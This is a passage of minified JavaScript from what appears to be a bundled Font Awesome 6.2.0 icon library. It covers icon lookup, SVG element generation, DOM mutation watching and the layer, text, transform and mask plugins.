Im.hooks.addPack||n?Im.styles[t]=ia(ia({},Im.styles[t]||{}),r):Im.hooks.addPack(t,DB(a)),"fas"===t&&B8("fa",a)}var TA,EA,DA,Q1=Im.styles,gbe=Im.shims,Cbe=(Ws(TA={},vr,Object.values(Cb[vr])),Ws(TA,Qr,Object.values(Cb[Qr])),TA),H8=null,xB={},wB={},IB={},RB={},SB={},ybe=(Ws(EA={},vr,Object.keys(_b[vr])),Ws(EA,Qr,Object.keys(_b[Qr])),EA);function Mbe(t,a){var e=a.split("-"),i=e[0],n=e.slice(1).join("-");return i!==t||""===n||function bbe(t){return~ebe.indexOf(t)}(n)?null:n}var kB=function(){var a=function(r){return F8(Q1,function(c,d,T){return c[T]=F8(d,r,{}),c},{})};xB=a(function(n,r,c){return r[3]&&(n[r[3]]=c),r[2]&&r[2].filter(function(T){return"number"==typeof T}).forEach(function(T){n[T.toString(16)]=c}),n}),wB=a(function(n,r,c){return n[c]=c,r[2]&&r[2].filter(function(T){return"string"==typeof T}).forEach(function(T){n[T]=c}),n}),SB=a(function(n,r,c){var d=r[2];return n[c]=c,d.forEach(function(T){n[T]=c}),n});var e="far"in Q1||Ca.autoFetchSvg,i=F8(gbe,function(n,r){var c=r[0],d=r[1],T=r[2];return"far"===d&&!e&&(d="fas"),"string"==typeof c&&(n.names[c]={prefix:d,iconName:T}),"number"==typeof c&&(n.unicodes[c.toString(16)]={prefix:d,iconName:T}),n},{names:{},unicodes:{}});IB=i.names,RB=i.unicodes,H8=xA(Ca.styleDefault,{family:Ca.familyDefault})};function U8(t,a){return(xB[t]||{})[a]}function Eg(t,a){return(SB[t]||{})[a]}function PB(t){return IB[t]||{prefix:null,iconName:null}}function Tp(){return H8}function xA(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.family,i=void 0===e?vr:e,n=_b[i][t],r=gb[i][t]||gb[i][n],c=t in Im.styles?t:null;return r||c||null}(function nbe(t){Mb.push(t)})(function(t){H8=xA(t.styleDefault,{family:Ca.familyDefault})}),kB();var OB=(Ws(DA={},vr,Object.keys(Cb[vr])),Ws(DA,Qr,Object.keys(Cb[Qr])),DA);function wA(t){var a,e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=e.skipLookups,n=void 0!==i&&i,r=(Ws(a={},vr,"".concat(Ca.cssPrefix,"-").concat(vr)),Ws(a,Qr,"".concat(Ca.cssPrefix,"-").concat(Qr)),a),c=null,d=vr;(t.includes(r[vr])||t.some(function(k){return OB[vr].includes(k)}))&&(d=vr),(t.includes(r[Qr])||t.some(function(k){return OB[Qr].includes(k)}))&&(d=Qr);var T=t.reduce(function(k,q){var Y=Mbe(Ca.cssPrefix,q);if(Q1[q]?(q=Cbe[d].includes(q)?$ye[d][q]:q,c=q,k.prefix=q):ybe[d].indexOf(q)>-1?(c=q,k.prefix=xA(q,{family:d})):Y?k.iconName=Y:q!==Ca.replacementClass&&q!==r[vr]&&q!==r[Qr]&&k.rest.push(q),!n&&k.prefix&&k.iconName){var te="fa"===c?PB(k.iconName):{},pe=Eg(k.prefix,k.iconName);te.prefix&&(c=null),k.iconName=te.iconName||pe||k.iconName,k.prefix=te.prefix||k.prefix,"far"===k.prefix&&!Q1.far&&Q1.fas&&!Ca.autoFetchSvg&&(k.prefix="fas")}return k},{prefix:null,iconName:null,rest:[]});return(t.includes("fa-brands")||t.includes("fab"))&&(T.prefix="fab"),(t.includes("fa-duotone")||t.includes("fad"))&&(T.prefix="fad"),!T.prefix&&d===Qr&&(Q1.fass||Ca.autoFetchSvg)&&(T.prefix="fass",T.iconName=Eg(T.prefix,T.iconName)||T.iconName),("fa"===T.prefix||"fa"===c)&&(T.prefix=Tp()||"fas"),T}var Tbe=function(){function t(){(function Nye(t,a){if(!(t instanceof a))throw new TypeError("Cannot call a class as a function")})(this,t),this.definitions={}}return function Lye(t,a,e){a&&nB(t.prototype,a),e&&nB(t,e),Object.defineProperty(t,"prototype",{writable:!1})}(t,[{key:"add",value:function(){for(var e=this,i=arguments.length,n=new Array(i),r=0;r<i;r++)n[r]=arguments[r];var c=n.reduce(this._pullDefinitions,{});Object.keys(c).forEach(function(d){e.definitions[d]=ia(ia({},e.definitions[d]||{}),c[d]),B8(d,c[d]);var T=Cb[vr][d];T&&B8(T,c[d]),kB()})}},{key:"reset",value:function(){this.definitions={}}},{key:"_pullDefinitions",value:function(e,i){var n=i.prefix&&i.iconName&&i.icon?{0:i}:i;return Object.keys(n).map(function(r){var c=n[r],d=c.prefix,T=c.iconName,k=c.icon,q=k[2];e[d]||(e[d]={}),q.length>0&&q.forEach(function(Y){"string"==typeof Y&&(e[d][Y]=k)}),e[d][T]=k}),e}}]),t}(),NB=[],$1={},K1={},Ebe=Object.keys(K1);function G8(t,a){for(var e=arguments.length,i=new Array(e>2?e-2:0),n=2;n<e;n++)i[n-2]=arguments[n];var r=$1[t]||[];return r.forEach(function(c){a=c.apply(null,[a].concat(i))}),a}function Dg(t){for(var a=arguments.length,e=new Array(a>1?a-1:0),i=1;i<a;i++)e[i-1]=arguments[i];var n=$1[t]||[];n.forEach(function(r){r.apply(null,e)})}function Jh(){var t=arguments[0],a=Array.prototype.slice.call(arguments,1);return K1[t]?K1[t].apply(null,a):void 0}function j8(t){"fa"===t.prefix&&(t.prefix="fas");var a=t.iconName,e=t.prefix||Tp();if(a)return a=Eg(e,a)||a,EB(LB.definitions,e,a)||EB(Im.styles,e,a)}var LB=new Tbe,wbe={i2svg:function(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};return Kh?(Dg("beforeI2svg",a),Jh("pseudoElements2svg",a),Jh("i2svg",a)):Promise.reject("Operation requires a DOM of some kind.")},watch:function(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},e=a.autoReplaceSvgRoot;!1===Ca.autoReplaceSvg&&(Ca.autoReplaceSvg=!0),Ca.observeMutations=!0,hbe(function(){Rbe({autoReplaceSvgRoot:e}),Dg("watch",a)})}},Ql={noAuto:function(){Ca.autoReplaceSvg=!1,Ca.observeMutations=!1,Dg("noAuto")},config:Ca,dom:wbe,parse:{icon:function(a){if(null===a)return null;if("object"===fA(a)&&a.prefix&&a.iconName)return{prefix:a.prefix,iconName:Eg(a.prefix,a.iconName)||a.iconName};if(Array.isArray(a)&&2===a.length){var e=0===a[1].indexOf("fa-")?a[1].slice(3):a[1],i=xA(a[0]);return{prefix:i,iconName:Eg(i,e)||e}}if("string"==typeof a&&(a.indexOf("".concat(Ca.cssPrefix,"-"))>-1||a.match(Kye))){var n=wA(a.split(" "),{skipLookups:!0});return{prefix:n.prefix||Tp(),iconName:Eg(n.prefix,n.iconName)||n.iconName}}if("string"==typeof a){var r=Tp();return{prefix:r,iconName:Eg(r,a)||a}}}},library:LB,findIconDefinition:j8,toHtml:Ab},Rbe=function(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},e=a.autoReplaceSvgRoot,i=void 0===e?Mr:e;(Object.keys(Im.styles).length>0||Ca.autoFetchSvg)&&Kh&&Ca.autoReplaceSvg&&Ql.dom.i2svg({node:i})};function IA(t,a){return Object.defineProperty(t,"abstract",{get:a}),Object.defineProperty(t,"html",{get:function(){return t.abstract.map(function(i){return Ab(i)})}}),Object.defineProperty(t,"node",{get:function(){if(Kh){var i=Mr.createElement("div");return i.innerHTML=t.html,i.children}}}),t}function Q8(t){var a=t.icons,e=a.main,i=a.mask,n=t.prefix,r=t.iconName,c=t.transform,d=t.symbol,T=t.title,k=t.maskId,q=t.titleId,Y=t.extra,te=t.watchable,pe=void 0!==te&&te,Re=i.found?i:e,Fe=Re.width,Ne=Re.height,et="fak"===n,ut=[Ca.replacementClass,r?"".concat(Ca.cssPrefix,"-").concat(r):""].filter(function(Ai){return-1===Y.classes.indexOf(Ai)}).filter(function(Ai){return""!==Ai||!!Ai}).concat(Y.classes).join(" "),Ze={children:[],attributes:ia(ia({},Y.attributes),{},{"data-prefix":n,"data-icon":r,class:ut,role:Y.attributes.role||"img",xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 ".concat(Fe," ").concat(Ne)})},yt=et&&!~Y.classes.indexOf("fa-fw")?{width:"".concat(Fe/Ne*16*.0625,"em")}:{};pe&&(Ze.attributes[Ag]=""),T&&(Ze.children.push({tag:"title",attributes:{id:Ze.attributes["aria-labelledby"]||"title-".concat(q||vb())},children:[T]}),delete Ze.attributes.title);var It=ia(ia({},Ze),{},{prefix:n,iconName:r,main:e,mask:i,maskId:k,transform:c,symbol:d,styles:ia(ia({},yt),Y.styles)}),St=i.found&&e.found?Jh("generateAbstractMask",It)||{children:[],attributes:{}}:Jh("generateAbstractIcon",It)||{children:[],attributes:{}},oi=St.attributes;return It.children=St.children,It.attributes=oi,d?function kbe(t){var e=t.iconName,i=t.children,n=t.attributes,r=t.symbol,c=!0===r?"".concat(t.prefix,"-").concat(Ca.cssPrefix,"-").concat(e):r;return[{tag:"svg",attributes:{style:"display: none;"},children:[{tag:"symbol",attributes:ia(ia({},n),{},{id:c}),children:i}]}]}(It):function Sbe(t){var a=t.children,e=t.main,i=t.mask,n=t.attributes,r=t.styles,c=t.transform;if(z8(c)&&e.found&&!i.found){var k={x:e.width/e.height/2,y:.5};n.style=vA(ia(ia({},r),{},{"transform-origin":"".concat(k.x+c.x/16,"em ").concat(k.y+c.y/16,"em")}))}return[{tag:"svg",attributes:n,children:a}]}(It)}function zB(t){var a=t.content,e=t.width,i=t.height,n=t.transform,r=t.title,c=t.extra,d=t.watchable,T=void 0!==d&&d,k=ia(ia(ia({},c.attributes),r?{title:r}:{}),{},{class:c.classes.join(" ")});T&&(k[Ag]="");var q=ia({},c.styles);z8(n)&&(q.transform=function lbe(t){var a=t.transform,e=t.width,n=t.height,r=void 0===n?16:n,c=t.startCentered,d=void 0!==c&&c,T="";return T+=d&&hB?"translate(".concat(a.x/16-(void 0===e?16:e)/2,"em, ").concat(a.y/16-r/2,"em) "):d?"translate(calc(-50% + ".concat(a.x/16,"em), calc(-50% + ").concat(a.y/16,"em)) "):"translate(".concat(a.x/16,"em, ").concat(a.y/16,"em) "),(T+="scale(".concat(a.size/16*(a.flipX?-1:1),", ").concat(a.size/16*(a.flipY?-1:1),") "))+"rotate(".concat(a.rotate,"deg) ")}({transform:n,startCentered:!0,width:e,height:i}),q["-webkit-transform"]=q.transform);var Y=vA(q);Y.length>0&&(k.style=Y);var te=[];return te.push({tag:"span",attributes:k,children:[a]}),r&&te.push({tag:"span",attributes:{class:"sr-only"},children:[r]}),te}function Pbe(t){var a=t.content,e=t.title,i=t.extra,n=ia(ia(ia({},i.attributes),e?{title:e}:{}),{},{class:i.classes.join(" ")}),r=vA(i.styles);r.length>0&&(n.style=r);var c=[];return c.push({tag:"span",attributes:n,children:[a]}),e&&c.push({tag:"span",attributes:{class:"sr-only"},children:[e]}),c}var $8=Im.styles;function K8(t){var a=t[0],e=t[1],r=w8(t.slice(4),1)[0];return{found:!0,width:a,height:e,icon:Array.isArray(r)?{tag:"g",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("duotone-group")},children:[{tag:"path",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("secondary"),fill:"currentColor",d:r[0]}},{tag:"path",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("primary"),fill:"currentColor",d:r[1]}}]}:{tag:"path",attributes:{fill:"currentColor",d:r}}}}var Obe={found:!1,width:512,height:512};function X8(t,a){var e=a;return"fa"===a&&null!==Ca.styleDefault&&(a=Tp()),new Promise(function(i,n){if(Jh("missingIconAbstract"),"fa"===e){var c=PB(t)||{};t=c.iconName||t,a=c.prefix||a}if(t&&a&&$8[a]&&$8[a][t])return i(K8($8[a][t]));(function Nbe(t,a){!gB&&!Ca.showMissingIcons&&t&&console.error('Icon with name "'.concat(t,'" and prefix "').concat(a,'" is missing.'))})(t,a),i(ia(ia({},Obe),{},{icon:Ca.showMissingIcons&&t&&Jh("missingIconAbstract")||{}}))})}var WB=function(){},Y8=Ca.measurePerformance&&_A&&_A.mark&&_A.measure?_A:{mark:WB,measure:WB},Tb='FA "6.2.0"',J8_begin=function(a){return Y8.mark("".concat(Tb," ").concat(a," begins")),function(){return function(a){Y8.mark("".concat(Tb," ").concat(a," ends")),Y8.measure("".concat(Tb," ").concat(a),"".concat(Tb," ").concat(a," begins"),"".concat(Tb," ").concat(a," ends"))}(a)}},RA=function(){};function VB(t){return"string"==typeof(t.getAttribute?t.getAttribute(Ag):null)}function Vbe(t){return Mr.createElementNS("http://www.w3.org/2000/svg",t)}function Bbe(t){return Mr.createElement(t)}function BB(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.ceFn,i=void 0===e?"svg"===t.tag?Vbe:Bbe:e;if("string"==typeof t)return Mr.createTextNode(t);var n=i(t.tag);Object.keys(t.attributes||[]).forEach(function(c){n.setAttribute(c,t.attributes[c])});var r=t.children||[];return r.forEach(function(c){n.appendChild(BB(c,{ceFn:i}))}),n}var SA={replace:function(a){var e=a[0];if(e.parentNode)if(a[1].forEach(function(n){e.parentNode.insertBefore(BB(n),e)}),null===e.getAttribute(Ag)&&Ca.keepOriginalSource){var i=Mr.createComment(function Hbe(t){var a=" ".concat(t.outerHTML," ");return"".concat(a,"Font Awesome fontawesome.com ")}(e));e.parentNode.replaceChild(i,e)}else e.remove()},nest:function(a){var e=a[0],i=a[1];if(~L8(e).indexOf(Ca.replacementClass))return SA.replace(a);var n=new RegExp("".concat(Ca.cssPrefix,"-.*"));if(delete i[0].attributes.id,i[0].attributes.class){var r=i[0].attributes.class.split(" ").reduce(function(d,T){return T===Ca.replacementClass||T.match(n)?d.toSvg.push(T):d.toNode.push(T),d},{toNode:[],toSvg:[]});i[0].attributes.class=r.toSvg.join(" "),0===r.toNode.length?e.removeAttribute("class"):e.setAttribute("class",r.toNode.join(" "))}var c=i.map(function(d){return Ab(d)}).join("\n");e.setAttribute(Ag,""),e.innerHTML=c}};function HB(t){t()}function UB(t,a){var e="function"==typeof a?a:RA;if(0===t.length)e();else{var i=HB;"async"===Ca.mutateApproach&&(i=vp.requestAnimationFrame||HB),i(function(){var n=function Fbe(){return!0===Ca.autoReplaceSvg?SA.replace:SA[Ca.autoReplaceSvg]||SA.replace}(),r=J8_begin("mutate");t.map(n),r(),e()})}}var Z8=!1;function qB(){Z8=!0}function eI(){Z8=!1}var kA=null;function GB(t){if(uB&&Ca.observeMutations){var a=t.treeCallback,e=void 0===a?RA:a,i=t.nodeCallback,n=void 0===i?RA:i,r=t.pseudoElementsCallback,c=void 0===r?RA:r,d=t.observeMutationsRoot,T=void 0===d?Mr:d;kA=new uB(function(k){if(!Z8){var q=Tp();j1(k).forEach(function(Y){if("childList"===Y.type&&Y.addedNodes.length>0&&!VB(Y.addedNodes[0])&&(Ca.searchPseudoElements&&c(Y.target),e(Y.target)),"attributes"===Y.type&&Y.target.parentNode&&Ca.searchPseudoElements&&c(Y.target.parentNode),"attributes"===Y.type&&VB(Y.target)&&~Zye.indexOf(Y.attributeName))if("class"===Y.attributeName&&function zbe(t){var a=t.getAttribute?t.getAttribute(P8):null,e=t.getAttribute?t.getAttribute(O8):null;return a&&e}(Y.target)){var te=wA(L8(Y.target)),Re=te.iconName;Y.target.setAttribute(P8,te.prefix||q),Re&&Y.target.setAttribute(O8,Re)}else(function Wbe(t){return t&&t.classList&&t.classList.contains&&t.classList.contains(Ca.replacementClass)})(Y.target)&&n(Y.target)})}}),Kh&&kA.observe(T,{childList:!0,attributes:!0,characterData:!0,subtree:!0})}}function qbe(t){var a=t.getAttribute("style"),e=[];return a&&(e=a.split(";").reduce(function(i,n){var r=n.split(":"),c=r[0],d=r.slice(1);return c&&d.length>0&&(i[c]=d.join(":").trim()),i},{})),e}function Gbe(t){var a=t.getAttribute("data-prefix"),e=t.getAttribute("data-icon"),i=void 0!==t.innerText?t.innerText.trim():"",n=wA(L8(t));return n.prefix||(n.prefix=Tp()),a&&e&&(n.prefix=a,n.iconName=e),n.iconName&&n.prefix||(n.prefix&&i.length>0&&(n.iconName=function vbe(t,a){return(wB[t]||{})[a]}(n.prefix,t.innerText)||U8(n.prefix,V8(t.innerText))),!n.iconName&&Ca.autoFetchSvg&&t.firstChild&&t.firstChild.nodeType===Node.TEXT_NODE&&(n.iconName=t.firstChild.data)),n}function jbe(t){var a=j1(t.attributes).reduce(function(n,r){return"class"!==n.name&&"style"!==n.name&&(n[r.name]=r.value),n},{}),e=t.getAttribute("title"),i=t.getAttribute("data-fa-title-id");return Ca.autoA11y&&(e?a["aria-labelledby"]="".concat(Ca.replacementClass,"-title-").concat(i||vb()):(a["aria-hidden"]="true",a.focusable="false")),a}function jB(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{styleParser:!0},e=Gbe(t),i=e.iconName,n=e.prefix,r=e.rest,c=jbe(t),d=G8("parseNodeAttributes",{},t),T=a.styleParser?qbe(t):[];return ia({iconName:i,title:t.getAttribute("title"),titleId:t.getAttribute("data-fa-title-id"),prefix:n,transform:xu,mask:{iconName:null,prefix:null,rest:[]},maskId:null,symbol:!1,extra:{classes:r,styles:T,attributes:c}},d)}var $be=Im.styles;function QB(t){var a="nest"===Ca.autoReplaceSvg?jB(t,{styleParser:!1}):jB(t);return~a.extra.classes.indexOf(CB)?Jh("generateLayersText",t,a):Jh("generateSvgReplacementMutation",t,a)}var Ep=new Set;function $B(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;if(!Kh)return Promise.resolve();var e=Mr.documentElement.classList,i=function(Y){return e.add("".concat(_B,"-").concat(Y))},n=function(Y){return e.remove("".concat(_B,"-").concat(Y))},r=Ca.autoFetchSvg?Ep:N8.map(function(q){return"fa-".concat(q)}).concat(Object.keys($be));r.includes("fa")||r.push("fa");var c=[".".concat(CB,":not([").concat(Ag,"])")].concat(r.map(function(q){return".".concat(q,":not([").concat(Ag,"])")})).join(", ");if(0===c.length)return Promise.resolve();var d=[];try{d=j1(t.querySelectorAll(c))}catch(q){}if(!(d.length>0))return Promise.resolve();i("pending"),n("complete");var T=J8_begin("onTree"),k=d.reduce(function(q,Y){try{var te=QB(Y);te&&q.push(te)}catch(pe){gB||"MissingIcon"===pe.name&&console.error(pe)}return q},[]);return new Promise(function(q,Y){Promise.all(k).then(function(te){UB(te,function(){i("active"),i("complete"),n("pending"),"function"==typeof a&&a(),T(),q()})}).catch(function(te){T(),Y(te)})})}function Kbe(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;QB(t).then(function(e){e&&UB([e],a)})}N8.map(function(t){Ep.add("fa-".concat(t))}),Object.keys(_b[vr]).map(Ep.add.bind(Ep)),Object.keys(_b[Qr]).map(Ep.add.bind(Ep)),Ep=fb(Ep);var Ybe=function(a){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=e.transform,n=void 0===i?xu:i,r=e.symbol,c=void 0!==r&&r,d=e.mask,T=void 0===d?null:d,k=e.maskId,q=void 0===k?null:k,Y=e.title,te=void 0===Y?null:Y,pe=e.titleId,Re=void 0===pe?null:pe,Fe=e.classes,Ne=void 0===Fe?[]:Fe,et=e.attributes,ut=void 0===et?{}:et,Ze=e.styles,yt=void 0===Ze?{}:Ze;if(a){var It=a.prefix,St=a.iconName,Nt=a.icon;return IA(ia({type:"icon"},a),function(){return Dg("beforeDOMElementCreation",{iconDefinition:a,params:e}),Ca.autoA11y&&(te?ut["aria-labelledby"]="".concat(Ca.replacementClass,"-title-").concat(Re||vb()):(ut["aria-hidden"]="true",ut.focusable="false")),Q8({icons:{main:K8(Nt),mask:T?K8(T.icon):{found:!1,width:null,height:null,icon:{}}},prefix:It,iconName:St,transform:ia(ia({},xu),n),symbol:c,title:te,maskId:q,titleId:Re,extra:{attributes:ut,styles:yt,classes:Ne}})})}},Jbe={mixout:function(){return{icon:(t=Ybe,function(a){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=(a||{}).icon?a:j8(a||{}),n=e.mask;return n&&(n=(n||{}).icon?n:j8(n||{})),t(i,ia(ia({},e),{},{mask:n}))})};var t},hooks:function(){return{mutationObserverCallbacks:function(e){return e.treeCallback=$B,e.nodeCallback=Kbe,e}}},provides:function(a){a.i2svg=function(e){var i=e.node,r=e.callback;return $B(void 0===i?Mr:i,void 0===r?function(){}:r)},a.generateSvgReplacementMutation=function(e,i){var n=i.iconName,r=i.title,c=i.titleId,d=i.prefix,T=i.transform,k=i.symbol,q=i.mask,Y=i.maskId,te=i.extra;return new Promise(function(pe,Re){Promise.all([X8(n,d),q.iconName?X8(q.iconName,q.prefix):Promise.resolve({found:!1,width:512,height:512,icon:{}})]).then(function(Fe){var Ne=w8(Fe,2);pe([e,Q8({icons:{main:Ne[0],mask:Ne[1]},prefix:d,iconName:n,transform:T,symbol:k,maskId:Y,title:r,titleId:c,extra:te,watchable:!0})])}).catch(Re)})},a.generateAbstractIcon=function(e){var k,i=e.children,n=e.attributes,r=e.main,c=e.transform,T=vA(e.styles);return T.length>0&&(n.style=T),z8(c)&&(k=Jh("generateAbstractTransformGrouping",{main:r,transform:c,containerWidth:r.width,iconWidth:r.width})),i.push(k||r.icon),{children:i,attributes:n}}}},Zbe={mixout:function(){return{layer:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.classes,r=void 0===n?[]:n;return IA({type:"layer"},function(){Dg("beforeDOMElementCreation",{assembler:e,params:i});var c=[];return e(function(d){Array.isArray(d)?d.map(function(T){c=c.concat(T.abstract)}):c=c.concat(d.abstract)}),[{tag:"span",attributes:{class:["".concat(Ca.cssPrefix,"-layers")].concat(fb(r)).join(" ")},children:c}]})}}}},eMe={mixout:function(){return{counter:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.title,r=void 0===n?null:n,c=i.classes,d=void 0===c?[]:c,T=i.attributes,k=void 0===T?{}:T,q=i.styles,Y=void 0===q?{}:q;return IA({type:"counter",content:e},function(){return Dg("beforeDOMElementCreation",{content:e,params:i}),Pbe({content:e.toString(),title:r,extra:{attributes:k,styles:Y,classes:["".concat(Ca.cssPrefix,"-layers-counter")].concat(fb(d))}})})}}}},tMe={mixout:function(){return{text:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.transform,r=void 0===n?xu:n,c=i.title,d=void 0===c?null:c,T=i.classes,k=void 0===T?[]:T,q=i.attributes,Y=void 0===q?{}:q,te=i.styles,pe=void 0===te?{}:te;return IA({type:"text",content:e},function(){return Dg("beforeDOMElementCreation",{content:e,params:i}),zB({content:e,transform:ia(ia({},xu),r),title:d,extra:{attributes:Y,styles:pe,classes:["".concat(Ca.cssPrefix,"-layers-text")].concat(fb(k))}})})}}},provides:function(a){a.generateLayersText=function(e,i){var n=i.title,r=i.transform,c=i.extra,d=null,T=null;if(hB){var k=parseInt(getComputedStyle(e).fontSize,10),q=e.getBoundingClientRect();d=q.width/k,T=q.height/k}return Ca.autoA11y&&!n&&(c.attributes["aria-hidden"]="true"),Promise.resolve([e,zB({content:e.innerHTML,width:d,height:T,transform:r,title:n,extra:c,watchable:!0})])}}},iMe=new RegExp('"',"ug"),KB=[1105920,1112319];function XB(t,a){var e="".concat("data-fa-pseudo-element-pending").concat(a.replace(":","-"));return new Promise(function(i,n){if(null!==t.getAttribute(e))return i();var c=j1(t.children).filter(function(Nt){return Nt.getAttribute(k8)===a})[0],d=vp.getComputedStyle(t,a),T=d.getPropertyValue("font-family").match(Xye),k=d.getPropertyValue("font-weight"),q=d.getPropertyValue("content");if(c&&!T)return t.removeChild(c),i();if(T&&"none"!==q&&""!==q){var Y=d.getPropertyValue("content"),te=~["Sharp"].indexOf(T[2])?Qr:vr,pe=~["Solid","Regular","Light","Thin","Duotone","Brands","Kit"].indexOf(T[2])?gb[te][T[2].toLowerCase()]:Yye[te][k],Re=function aMe(t){var a=t.replace(iMe,""),e=function _be(t,a){var n,e=t.length,i=t.charCodeAt(a);return i>=55296&&i<=56319&&e>a+1&&(n=t.charCodeAt(a+1))>=56320&&n<=57343?1024*(i-55296)+n-56320+65536:i}(a,0),i=e>=KB[0]&&e<=KB[1],n=2===a.length&&a[0]===a[1];return{value:V8(n?a[0]:a),isSecondary:i||n}}(Y),Fe=Re.value,Ne=Re.isSecondary,et=T[0].startsWith("FontAwesome"),ut=U8(pe,Fe),Ze=ut;if(et){var yt=function Abe(t){var a=RB[t],e=U8("fas",t);return a||(e?{prefix:"fas",iconName:e}:null)||{prefix:null,iconName:null}}(Fe);yt.iconName&&yt.prefix&&(ut=yt.iconName,pe=yt.prefix)}if(!ut||Ne||c&&c.getAttribute(P8)===pe&&c.getAttribute(O8)===Ze)i();else{t.setAttribute(e,Ze),c&&t.removeChild(c);var It=function Qbe(){return{iconName:null,title:null,titleId:null,prefix:null,transform:xu,symbol:!1,mask:{iconName:null,prefix:null,rest:[]},maskId:null,extra:{classes:[],styles:{},attributes:{}}}}(),St=It.extra;St.attributes[k8]=a,X8(ut,pe).then(function(Nt){var oi=Q8(ia(ia({},It),{},{icons:{main:Nt,mask:{prefix:null,iconName:null,rest:[]}},prefix:pe,iconName:Ze,extra:St,watchable:!0})),Ai=Mr.createElement("svg");"::before"===a?t.insertBefore(Ai,t.firstChild):t.appendChild(Ai),Ai.outerHTML=oi.map(function(vi){return Ab(vi)}).join("\n"),t.removeAttribute(e),i()}).catch(n)}}else i()})}function nMe(t){return Promise.all([XB(t,"::before"),XB(t,"::after")])}function oMe(t){return!(t.parentNode===document.head||~Qye.indexOf(t.tagName.toUpperCase())||t.getAttribute(k8)||t.parentNode&&"svg"===t.parentNode.tagName)}function YB(t){if(Kh)return new Promise(function(a,e){var i=j1(t.querySelectorAll("*")).filter(oMe).map(nMe),n=J8_begin("searchPseudoElements");qB(),Promise.all(i).then(function(){n(),eI(),a()}).catch(function(){n(),eI(),e()})})}var JB=!1,ZB=function(a){return a.toLowerCase().split(" ").reduce(function(i,n){var r=n.toLowerCase().split("-"),c=r[0],d=r.slice(1).join("-");if(c&&"h"===d)return i.flipX=!0,i;if(c&&"v"===d)return i.flipY=!0,i;if(d=parseFloat(d),isNaN(d))return i;switch(c){case"grow":i.size=i.size+d;break;case"shrink":i.size=i.size-d;break;case"left":i.x=i.x-d;break;case"right":i.x=i.x+d;break;case"up":i.y=i.y-d;break;case"down":i.y=i.y+d;break;case"rotate":i.rotate=i.rotate+d}return i},{size:16,x:0,y:0,flipX:!1,flipY:!1,rotate:0})},tI={x:0,y:0,width:"100%",height:"100%"};function eH(t){var a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1];return t.attributes&&(t.attributes.fill||a)&&(t.attributes.fill="black"),t}!function Dbe(t,a){var e=a.mixoutsTo;NB=t,$1={},Object.keys(K1).forEach(function(i){-1===Ebe.indexOf(i)&&delete K1[i]}),NB.forEach(function(i){var n=i.mixout?i.mixout():{};if(Object.keys(n).forEach(function(c){"function"==typeof n[c]&&(e[c]=n[c]),"object"===fA(n[c])&&Object.keys(n[c]).forEach(function(d){e[c]||(e[c]={}),e[c][d]=n[c][d]})}),i.hooks){var r=i.hooks();Object.keys(r).forEach(function(c){$1[c]||($1[c]=[]),$1[c].push(r[c])})}i.provides&&i.provides(K1)})}([mbe,Jbe,Zbe,eMe,tMe,{hooks:function(){return{mutationObserverCallbacks:function(e){return e.pseudoElementsCallback=YB,e}}},provides:function(a){a.pseudoElements2svg=function(e){var i=e.node;Ca.searchPseudoElements&&YB(void 0===i?Mr:i)}}},{mixout:function(){return{dom:{unwatch:function(){qB(),JB=!0}}}},hooks:function(){return{bootstrap:function(){GB(G8("mutationObserverCallbacks",{}))},noAuto:function(){!function Ube(){!kA||kA.disconnect()}()},watch:function(e){var i=e.observeMutationsRoot;JB?eI():GB(G8("mutationObserverCallbacks",{observeMutationsRoot:i}))}}}},{mixout:function(){return{parse:{transform:function(e){return ZB(e)}}}},hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-transform");return n&&(e.transform=ZB(n)),e}}},provides:function(a){a.generateAbstractTransformGrouping=function(e){var i=e.main,n=e.transform,c=e.iconWidth,d={transform:"translate(".concat(e.containerWidth/2," 256)")},T="translate(".concat(32*n.x,", ").concat(32*n.y,") "),k="scale(".concat(n.size/16*(n.flipX?-1:1),", ").concat(n.size/16*(n.flipY?-1:1),") "),q="rotate(".concat(n.rotate," 0 0)"),pe={outer:d,inner:{transform:"".concat(T," ").concat(k," ").concat(q)},path:{transform:"translate(".concat(c/2*-1," -256)")}};return{tag:"g",attributes:ia({},pe.outer),children:[{tag:"g",attributes:ia({},pe.inner),children:[{tag:i.icon.tag,children:i.icon.children,attributes:ia(ia({},i.icon.attributes),pe.path)}]}]}}}},{hooks:function(){return{parseNodeAttributes:function(e,i){var n=i.getAttribute("data-fa-mask"),r=n?wA(n.split(" ").map(function(c){return c.trim()})):{prefix:null,iconName:null,rest:[]};return r.prefix||(r.prefix=Tp()),e.mask=r,e.maskId=i.getAttribute("data-fa-mask-id"),e}}},provides:function(a){a.generateAbstractMask=function(e){var t,i=e.children,n=e.attributes,r=e.main,c=e.mask,d=e.maskId,q=r.icon,te=c.icon,pe=function cbe(t){var a=t.transform,i=t.iconWidth,n={transform:"translate(".concat(t.containerWidth/2," 256)")},r="translate(".concat(32*a.x,", ").concat(32*a.y,") "),c="scale(".concat(a.size/16*(a.flipX?-1:1),", ").concat(a.size/16*(a.flipY?-1:1),") "),d="rotate(".concat(a.rotate," 0 0)");return{outer:n,inner:{transform:"".concat(r," ").concat(c," ").concat(d)},path:{transform:"translate(".concat(i/2*-1," 